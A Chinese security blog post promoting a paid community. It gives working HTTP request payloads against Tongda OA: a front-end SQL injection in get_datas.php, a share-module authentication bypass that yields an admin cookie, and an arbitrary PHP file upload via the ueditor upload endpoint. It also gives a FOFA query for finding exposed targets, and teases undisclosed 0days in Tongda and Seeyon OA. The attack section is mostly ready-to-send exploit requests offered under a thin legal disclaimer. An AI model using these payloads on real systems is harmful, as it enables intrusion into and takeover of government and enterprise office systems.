文章总结： 本文介绍了通达OA系统的多个安全漏洞，包括get_datas.php前台SQL注入、share身份认证绕过、action前台任意文件上传以及一个新发现的delete_result普通用户登录后SQL注入0day漏洞。文章提供了部分漏洞的POC和利用方法，并提到还发现了致远OA的管理员后台任意代码执行漏洞。作者表示完整的技术细节和利用代码将在其知识星球中分享，而非公开。文章还包含大量推广其知识星球的内容，邀请读者加入获取更多漏洞信息、工具源码和实战经验。 综合评分： 65 文章分类： 漏洞分析,0day,渗透测试,漏洞POC,WEB安全

【0day】通达 OA 0day 小试牛刀，附 Nday Poc 干货

原创

SharkSec

SharkSec

2025年11月28日 19:18 中国香港

🔔 温馨提示：为了防止走散，不错过每一篇干货内容，请记得将公众号设置为星标！🌟

【声明】本文技术、思路及工具仅用于合法安全测试与防御研究，严禁用于非法入侵、攻击他人系统或盈利等违法违规行为，一切后果由操作者自行承担，作者及团队不承担任何连带责任。

系统介绍

通达OA是国内主流国产化办公自动化系统，采用PHP+MySQL架构，主打低代码流程与电子公文，广泛部署于政企内网，11.x版本默认集成Apache，目录结构松散、入口众多，历史漏洞集中在/general/与/module/下的文件上传、SQL注入与反序列化点。

fofa语法：

app="TDXK-通达OA" || app="通达OA网络智能办公系统" || body="tongda.ico" || body="tongda" || icon_hash="-759108386"

tips：末尾还附赠致远OA 0day~

1

get_datas.php前台SQL注入

GET /general/reportshop/utils/get_datas.php?USER_ID=OfficeTask&PASSWORD=&col=1&tab=5 where 1={`='` 2} union select md5(1)-- ' HTTP/1.1Host: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:145.0) Gecko/20100101 Firefox/145.0Accept: */*Connection: Keep-Alive

2

share 身份认证绕过

获取share_id值

GET /share/handle.php?module=2&module_id=1 HTTP/1.1Host: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:145.0) Gecko/20100101 Firefox/145.0Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2Connection: close

利用刚才获取的share_id值，进一步获取cookie

GET /share/index.php?share_id=xxxx HTTP/1.1Host:User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:145.0) Gecko/20100101 Firefox/145.0Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2Connection: close

再利用获取的cookie，进入后台

GET /general/index.php HTTP/1.1Host：User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:145.0) Gecko/20100101 Firefox/145.0Cookie: Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2Connection: close

3

action前台任意文件上传

POST /module/ueditor/php/action_upload.php?action=uploadfile HTTP/1.1Host: Cache-Control: max-age=0Accept-Language: zh-CN,zh;q=0.9Upgrade-Insecure-Requests: 1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflate, brConnection: keep-aliveContent-Type: multipart/form-data; boundary=---------------------------55719851240137822763221368724X_requested_with: XMLHttpRequestContent-Length: 881 -----------------------------55719851240137822763221368724Content-Disposition: form-data; name="CONFIG[fileFieldName]" ffff-----------------------------55719851240137822763221368724Content-Disposition: form-data; name="CONFIG[fileMaxSize]" 1000000000-----------------------------55719851240137822763221368724Content-Disposition: form-data; name="CONFIG[filePathFormat]" tcmd-----------------------------55719851240137822763221368724Content-Disposition: form-data; name="CONFIG[fileAllowFiles][]" .php-----------------------------55719851240137822763221368724Content-Disposition: form-data; name="ffff"; filename="test.php"Content-Type: application/octet-stream 123456-----------------------------55719851240137822763221368724Content-Disposition: form-data; name="mufile" submit-----------------------------55719851240137822763221368724--

4

0day–delete_result 普通用户登录后SQL注入漏洞

这里前期福利放送，再给大家送个0day–致远OA 管理员后台任意代码执行：

该漏洞影响致远OA全版本，不过需要先获取管理员后台权限，结合管理员登录绕过漏洞进行利用。（管理员登录绕过上一篇0day系列已发：致远OA基础审计速通｜新手也能懂的代码审计全流程）

漏洞利用：

关于本次0day的完整审计过程、POC/EXP、后渗透利用及系统源码，为安全起见将不再公开至公众号，后续完整内容将统一上传至知识星球，后期也会陆续更新某蝶，某锁等0day和1day，敬请期待~

如果大家对我们的文章技术有什么建议或者工具使用上的反馈，都欢迎大家在评论区留言交流。对我们分享的文章感兴趣，想要深入探讨、交流并学习更多相关内容，也欢迎各位师傅加入官方技术交流群!!!（关注公众号，点击菜单栏：联系我们->技术交流群，添加管理员微信，备注【加群】，拉您进群）

加入星球，一起进阶！

我们星球刚建设开放不久，大量福利来袭：有一线团队的一手攻防经验、私有工具源码（包括咱们公众号发的工具，星球里能直接拿源码 + 持续迭代），还有漏洞挖掘的 POC/EXP、每月定期两次 0day 分享，hw实战攻防遇见高频oa/设备源码都能在这拿到。

技术方向也刚好对标咱们平时的需求：工具开发、漏洞挖掘、代码审计、实战攻防这些全涵盖，甚至连 AI 安全的新玩法也会同步。

对了，星球里还有些「刚需资源」：FOFA 的 Key 长期能用，Cursor Pro 共享账号登了就能用； 企业 SRC 案例、红队实战经验也会拆解着讲。

现在星球现价 119 / 人，等满 100 人就涨到 129 了 —— 入了星球还能进专属内部群，比咱们公开交流群的资源更新更实时、讨论也更深度。

想上车的朋友直接扫描文末二维码了解详情，早入早享资源～

结束

👉 点击关注不迷路，一起潜入深水区，突破边界，共同精进！🚀

查看原文：《【0day】通达 OA 0day 小试牛刀，附 Nday Poc 干货》